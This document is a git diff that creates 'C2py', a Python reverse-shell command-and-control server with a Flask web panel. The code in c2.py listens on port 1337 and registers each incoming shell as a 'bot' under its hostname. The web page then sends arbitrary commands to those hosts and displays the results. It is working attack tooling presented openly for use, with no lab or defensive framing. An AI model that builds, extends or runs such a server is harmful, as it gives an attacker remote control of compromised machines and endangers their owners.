batman

.gitignore

@@ -0,0 +1,3 @@
+.python-version
+__pycache__
+uv.lock

README.md

@@ -0,0 +1,4 @@
+# C2py
+
+Python based reverse shell command and control with web interface
+

c2.py

@@ -0,0 +1,58 @@
+#!/usr/bin/env python3
+from socket import SOCK_STREAM, AF_INET, socket
+from flask import Flask, request, render_template
+from threading import Thread
+
+
+SOCKET = None
+app = Flask(__name__)
+threads = []
+bots = {}
+
+
+@app.route('/')
+def index():
+    return render_template('index.j2', bots=bots.keys())
+
+
+@app.route('/shell/<name>')
+def shell(name):
+    cmd = request.args.get('cmd')
+    conn = bots.get(name)
+    res = None
+    if cmd and conn:
+        conn.sendall(cmd.encode() + b'\n')
+        res = conn.recv(4096).decode()[:-2].replace('\n', '<br/>')
+    return render_template('shell.j2', name=name, res=res)
+
+
+def thread(target, args=()):
+    thread = Thread(target=target, args=args)
+    threads.append(thread)
+    thread.start()
+    return thread
+
+
+def listen():
+    with socket(AF_INET, SOCK_STREAM) as sock:
+        SOCKET = sock
+        sock.bind(('0.0.0.0', 1337))
+        sock.listen()
+        while 'pwnd':
+            conn, addr = sock.accept()
+            thread(handle, (conn,))
+
+
+def handle(conn):
+    assert conn.recv(2) == b'$ '
+    conn.sendall(b'hostname\n')
+    hostname = conn.recv(255).split(b'\n')[0]
+    bots[hostname.decode()] = conn
+
+
+if __name__ == '__main__':
+    try:
+        thread(listen)
+        app.run()
+    except KeyboardInterrupt:
+        SOCKET.close()

main.py

@@ -0,0 +1,6 @@
+def main():
+    print("Hello from c2py!")
+
+
+if __name__ == "__main__":
+    main()

pyproject.toml

@@ -0,0 +1,9 @@
+[project]
+name = "c2py"
+version = "0.1.0"
+description = "Python based C2 server"
+readme = "README.md"
+requires-python = ">=3.12"
+dependencies = [
+    "flask>=3.1.2",
+]

static/style.css

@@ -0,0 +1,5 @@
+
+body {
+    background-color: #333;
+    color: lime;
+}

templates/base.j2

@@ -0,0 +1,11 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <link rel="stylesheet" href="/static/style.css" />
+    <title>{% block title %}{% endblock %} - C2py</title>
+    {% block head %}{% endblock %}
+</head>
+<body>
+{% block body %}{% endblock %}
+</body>
+</html>

templates/index.j2

@@ -0,0 +1,16 @@
+{% extends "base.j2" %}
+{% block title %}Home{% endblock %}
+{% block head %}
+{% endblock %}
+{% block body %}
+<h1>C2py</h1>
+<p class="important">
+Welcome to my awesome command and control admin panel!
+</p>
+<h3>Active bots;</h3>
+{% for bot in bots %}
+<a href='/shell/{{ bot }}' target='_blank'><p>{{ bot }}</p></a>
+{% else %}
+<p>None</p>
+{% endfor %}
+{% endblock %}

templates/shell.j2

@@ -0,0 +1,14 @@
+{% extends "base.j2" %}
+{% block title %}shell - {{ name }}{% endblock %}
+{% block head %}
+{% endblock %}
+{% block body %}
+<h1>C2py - shell - {{ name }}</h1>
+<form method="get" name="{{ name }}">
+<input type="text" name="cmd" autofocus id="cmd" size="80">
+<input type="submit" value="Execute">
+</form>
+{% if res  %}
+<p>{{ res }}</p>
+{% endif %}
+{% endblock %}